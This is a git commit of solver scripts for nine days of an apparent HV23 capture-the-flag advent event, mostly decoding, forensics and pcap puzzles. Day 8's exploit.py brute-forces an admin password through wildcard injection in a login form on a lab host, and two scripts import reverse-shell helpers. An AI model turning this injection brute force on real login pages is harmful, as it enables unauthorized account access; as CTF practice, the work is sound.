Initial Commit Day 1-9
This commit is contained in:
commit
697849f63e
BIN
Day 1/a-letter-from-santa.zip
Normal file
BIN
Day 1/a-letter-from-santa.zip
Normal file
Binary file not shown.
32
Day 1/decode.py
Normal file
32
Day 1/decode.py
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
import string
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from PIL import Image
|
||||||
|
from pyzbar.pyzbar import decode
|
||||||
|
|
||||||
|
qr_size = 25
|
||||||
|
pix_size = 10
|
||||||
|
img_size = pix_size * qr_size
|
||||||
|
|
||||||
|
with open("templates/santa.j2", "r") as f:
|
||||||
|
soup = BeautifulSoup(f.read(), "html.parser")
|
||||||
|
img = Image.new("RGB", (img_size, img_size), "white")
|
||||||
|
y = 0
|
||||||
|
|
||||||
|
for c in string.ascii_lowercase:
|
||||||
|
bin_str = ""
|
||||||
|
x = 0
|
||||||
|
for e in soup.find_all("span"):
|
||||||
|
if e.text.strip() == "{{" + c + "}}":
|
||||||
|
if "a" in e["class"]:
|
||||||
|
color = (0, 0, 0)
|
||||||
|
else:
|
||||||
|
color = (255, 255, 255)
|
||||||
|
|
||||||
|
for xi in range(x, x+pix_size):
|
||||||
|
for yi in range(y, y+pix_size):
|
||||||
|
img.putpixel((xi, yi), color)
|
||||||
|
|
||||||
|
x += pix_size
|
||||||
|
y += pix_size
|
||||||
|
|
||||||
|
print("[+] Flag:", decode(img)[0].data.decode())
|
2
Day 1/templates/santa.j2
Normal file
2
Day 1/templates/santa.j2
Normal file
File diff suppressed because one or more lines are too long
3
Day 2/decode.py
Normal file
3
Day 2/decode.py
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
|
||||||
|
# "PGP++++" -> Philip Zimmerman
|
||||||
|
print("[+] Flag: HV23{Philip Zimmerman}")
|
58
Day 3/decode.py
Normal file
58
Day 3/decode.py
Normal file
@ -0,0 +1,58 @@
|
|||||||
|
data = [
|
||||||
|
["8","c","t","k","3"],
|
||||||
|
["2","r","H","V","r"],
|
||||||
|
["2","y",None,"0","v"],
|
||||||
|
["2","e","n","3","_"],
|
||||||
|
["}","3","h","{","m"],
|
||||||
|
]
|
||||||
|
|
||||||
|
def find_char(c, min=(0, 0)):
|
||||||
|
for x, row in enumerate(data):
|
||||||
|
for y, v in enumerate(row):
|
||||||
|
if v == c and (x, y) >= min:
|
||||||
|
return (x, y)
|
||||||
|
|
||||||
|
|
||||||
|
def find_key(cirb="HV23{"):
|
||||||
|
min = (0, 0)
|
||||||
|
key = []
|
||||||
|
for c in cirb:
|
||||||
|
key.append(find_char(c, min))
|
||||||
|
min = key[-1]
|
||||||
|
key[3] = (4, 1) # or (3, 3)
|
||||||
|
key.append(rotate(find_char('}'), 3)) # for final '}'
|
||||||
|
return key
|
||||||
|
|
||||||
|
def rotate(key, rotation):
|
||||||
|
rotation = rotation % 4
|
||||||
|
if rotation == 0:
|
||||||
|
return key
|
||||||
|
|
||||||
|
n = len(data) - 1
|
||||||
|
rotated = []
|
||||||
|
|
||||||
|
if isinstance(key, list):
|
||||||
|
for (x, y) in key:
|
||||||
|
rotated.append((y, n - x))
|
||||||
|
else:
|
||||||
|
rotated = (key[1], n - key[0])
|
||||||
|
|
||||||
|
if rotation > 1:
|
||||||
|
return rotate(rotated, rotation - 1)
|
||||||
|
|
||||||
|
return rotated
|
||||||
|
|
||||||
|
def get_text(key, rotation=0):
|
||||||
|
text = ""
|
||||||
|
key = list(sorted(rotate(key, rotation)))
|
||||||
|
for (x, y) in key:
|
||||||
|
text += data[x][y]
|
||||||
|
return text
|
||||||
|
|
||||||
|
key = find_key()
|
||||||
|
|
||||||
|
flag = ""
|
||||||
|
for i in range(0, 4):
|
||||||
|
flag += get_text(key, -i)
|
||||||
|
|
||||||
|
print("[+] Flag:", flag)
|
BIN
Day 4/bowser.elf
Executable file
BIN
Day 4/bowser.elf
Executable file
Binary file not shown.
26
Day 4/decode.py
Normal file
26
Day 4/decode.py
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
from hackingscripts import util
|
||||||
|
from pwn import context, disasm
|
||||||
|
import re
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
with open("bowser.elf", "rb") as f:
|
||||||
|
elf = f.read()
|
||||||
|
|
||||||
|
context.arch = "amd64"
|
||||||
|
offset = 0x1332
|
||||||
|
flag = b""
|
||||||
|
|
||||||
|
for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
|
||||||
|
match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
|
||||||
|
if match:
|
||||||
|
flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
|
||||||
|
else:
|
||||||
|
match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
|
||||||
|
if match:
|
||||||
|
flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
|
||||||
|
elif re.match(r"call\s+.*", instr):
|
||||||
|
break
|
||||||
|
|
||||||
|
flag = flag.split(b"\x00")[1].decode()
|
||||||
|
print("[+] Flag:", flag)
|
||||||
|
|
BIN
Day 5/aurora.mp4
Normal file
BIN
Day 5/aurora.mp4
Normal file
Binary file not shown.
47
Day 5/decode.py
Normal file
47
Day 5/decode.py
Normal file
@ -0,0 +1,47 @@
|
|||||||
|
from PIL import Image
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import operator
|
||||||
|
import subprocess
|
||||||
|
import shutil
|
||||||
|
|
||||||
|
def extract_frames(destination):
|
||||||
|
os.makedirs(destination, exist_ok=True)
|
||||||
|
subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
|
||||||
|
print()
|
||||||
|
|
||||||
|
def parse_frame(file):
|
||||||
|
img = Image.open(file)
|
||||||
|
pix = img.load()
|
||||||
|
return img.size, pix
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
|
||||||
|
output_directory = "frames"
|
||||||
|
pixel_sum = None
|
||||||
|
count = 0
|
||||||
|
|
||||||
|
extract_frames(output_directory)
|
||||||
|
for file in sorted(os.listdir(output_directory)):
|
||||||
|
if file.endswith(".png"):
|
||||||
|
sys.stdout.write(f"\rAnalyzing: {file}")
|
||||||
|
(width, height), pix = parse_frame(os.path.join(output_directory, file))
|
||||||
|
if pixel_sum is None:
|
||||||
|
pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
|
||||||
|
|
||||||
|
for x in range(width):
|
||||||
|
for y in range(height):
|
||||||
|
pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
|
||||||
|
|
||||||
|
count += 1
|
||||||
|
|
||||||
|
print("\nComposing new image")
|
||||||
|
img = Image.new("RGB", (width, height))
|
||||||
|
pix = img.load()
|
||||||
|
|
||||||
|
for x in range(width):
|
||||||
|
for y in range(height):
|
||||||
|
pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
|
||||||
|
|
||||||
|
img.save(f"result.png")
|
||||||
|
shutil.rmtree(output_directory)
|
BIN
Day 5/result.png
Normal file
BIN
Day 5/result.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 296 KiB |
1
Day 6/.gitattributes
vendored
Normal file
1
Day 6/.gitattributes
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
memory.raw filter=lfs diff=lfs merge=lfs -text
|
BIN
Day 6/cool-santa-claus.jpg
Normal file
BIN
Day 6/cool-santa-claus.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 186 KiB |
3
Day 6/extract.sh
Normal file
3
Day 6/extract.sh
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
vol -f memory.raw windows.info
|
||||||
|
vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
|
||||||
|
vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0
|
4480
Day 6/files.txt
Executable file
4480
Day 6/files.txt
Executable file
File diff suppressed because it is too large
Load Diff
3
Day 6/memory.raw
Executable file
3
Day 6/memory.raw
Executable file
@ -0,0 +1,3 @@
|
|||||||
|
version https://git-lfs.github.com/spec/v1
|
||||||
|
oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
|
||||||
|
size 2147483648
|
BIN
Day 6/wallpaper.png
Normal file
BIN
Day 6/wallpaper.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.6 MiB |
63
Day 7/exploit.py
Normal file
63
Day 7/exploit.py
Normal file
@ -0,0 +1,63 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
|
||||||
|
# https://git.romanh.de/Roman/HackingScripts
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
import time
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
|
import subprocess
|
||||||
|
import urllib.parse
|
||||||
|
import string
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from hackingscripts import util, rev_shell
|
||||||
|
from hackingscripts.fileserver import HttpFileServer
|
||||||
|
|
||||||
|
import socket
|
||||||
|
from PIL import Image
|
||||||
|
|
||||||
|
from urllib3.exceptions import InsecureRequestWarning
|
||||||
|
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||||
|
|
||||||
|
HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
|
||||||
|
IP_ADDRESS = util.get_address()
|
||||||
|
|
||||||
|
def get_image_bytes():
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
sock.connect((HOST, 80))
|
||||||
|
sock.sendall(b"\n")
|
||||||
|
|
||||||
|
data = b""
|
||||||
|
|
||||||
|
while True:
|
||||||
|
b = sock.recv(1024)
|
||||||
|
if not b:
|
||||||
|
break
|
||||||
|
|
||||||
|
data += b
|
||||||
|
|
||||||
|
body_offset = data.index(b"\n\n") # malformed here
|
||||||
|
header, body = data[:body_offset], data[body_offset+2:]
|
||||||
|
|
||||||
|
return header, body
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
|
||||||
|
header, body = get_image_bytes()
|
||||||
|
|
||||||
|
flag = ""
|
||||||
|
while body:
|
||||||
|
offset_index = body.index(b"\r\n")
|
||||||
|
chunk_size = int(body[0:offset_index], 16)
|
||||||
|
offset = offset_index + 2
|
||||||
|
chunk = body[offset:offset+chunk_size]
|
||||||
|
body = body[offset+chunk_size+2:]
|
||||||
|
|
||||||
|
if chunk_size > 0x900:
|
||||||
|
flag += chr(chunk_size & 0xFF)
|
||||||
|
|
||||||
|
print("[+] Flag:", flag)
|
BIN
Day 8/bask-source.zip
Normal file
BIN
Day 8/bask-source.zip
Normal file
Binary file not shown.
85
Day 8/exploit.py
Normal file
85
Day 8/exploit.py
Normal file
@ -0,0 +1,85 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
|
||||||
|
# https://git.romanh.de/Roman/HackingScripts
|
||||||
|
|
||||||
|
import string
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
import time
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
|
import subprocess
|
||||||
|
import urllib.parse
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from hackingscripts import util, rev_shell
|
||||||
|
from hackingscripts.fileserver import HttpFileServer
|
||||||
|
|
||||||
|
from urllib3.exceptions import InsecureRequestWarning
|
||||||
|
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||||
|
|
||||||
|
BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||||
|
IP_ADDRESS = util.get_address()
|
||||||
|
|
||||||
|
def request(method, uri, **kwargs):
|
||||||
|
if not uri.startswith("/") and uri != "":
|
||||||
|
uri = "/" + uri
|
||||||
|
|
||||||
|
client = requests
|
||||||
|
if "session" in kwargs:
|
||||||
|
client = kwargs["session"]
|
||||||
|
del kwargs["session"]
|
||||||
|
|
||||||
|
if "allow_redirects" not in kwargs:
|
||||||
|
kwargs["allow_redirects"] = False
|
||||||
|
|
||||||
|
if "verify" not in kwargs:
|
||||||
|
kwargs["verify"] = False
|
||||||
|
|
||||||
|
if "proxies" not in kwargs:
|
||||||
|
kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
|
||||||
|
|
||||||
|
return client.request(method, BASE_URL + uri, **kwargs)
|
||||||
|
|
||||||
|
def login(password):
|
||||||
|
while True:
|
||||||
|
# post payload is not URL decoded, so we can't use dictionary
|
||||||
|
res = request("POST", "/login", data=f"password={password}")
|
||||||
|
if "Successfully logged in" in res.text:
|
||||||
|
return True
|
||||||
|
elif "Invalid username or password!" in res.text:
|
||||||
|
return False
|
||||||
|
|
||||||
|
def retrieve_flag(cookie):
|
||||||
|
while True:
|
||||||
|
res = request("GET", "/admin", cookies={"admin_token": cookie})
|
||||||
|
util.assert_content_type(res, "text/html")
|
||||||
|
if "You are not authorized to view this page." in res.text:
|
||||||
|
return None
|
||||||
|
else:
|
||||||
|
match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
|
||||||
|
if match:
|
||||||
|
return match[1]
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
password = "salami"
|
||||||
|
flag = retrieve_flag(password)
|
||||||
|
while flag is None:
|
||||||
|
found = False
|
||||||
|
for x in string.printable:
|
||||||
|
if x in ["*", "\\"]:
|
||||||
|
continue
|
||||||
|
|
||||||
|
if login(password + x + "*"):
|
||||||
|
password += x
|
||||||
|
found = True
|
||||||
|
flag = retrieve_flag(password)
|
||||||
|
break
|
||||||
|
|
||||||
|
if not found:
|
||||||
|
break
|
||||||
|
|
||||||
|
print("[+] Flag:", flag)
|
22
Day 9/decode.py
Normal file
22
Day 9/decode.py
Normal file
@ -0,0 +1,22 @@
|
|||||||
|
import os
|
||||||
|
import re
|
||||||
|
import datetime
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
|
||||||
|
chars = []
|
||||||
|
pcap_extractor = PcapExtractor("secret_capture.pcapng")
|
||||||
|
for response in pcap_extractor:
|
||||||
|
match = re.match(r"/\?door=(\d)", response.get_file_path())
|
||||||
|
if match and isinstance(response, HttpResponse):
|
||||||
|
request = response.response_to
|
||||||
|
ip, port = request.socket.split(":")
|
||||||
|
port = int(port)
|
||||||
|
c = chr(port - 56700)
|
||||||
|
dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
|
||||||
|
chars.append((dt, c))
|
||||||
|
|
||||||
|
flag = "".join(entry[1] for entry in sorted(chars))
|
||||||
|
print("[+] Flag:", flag)
|
BIN
Day 9/secret_capture.pcapng
Normal file
BIN
Day 9/secret_capture.pcapng
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user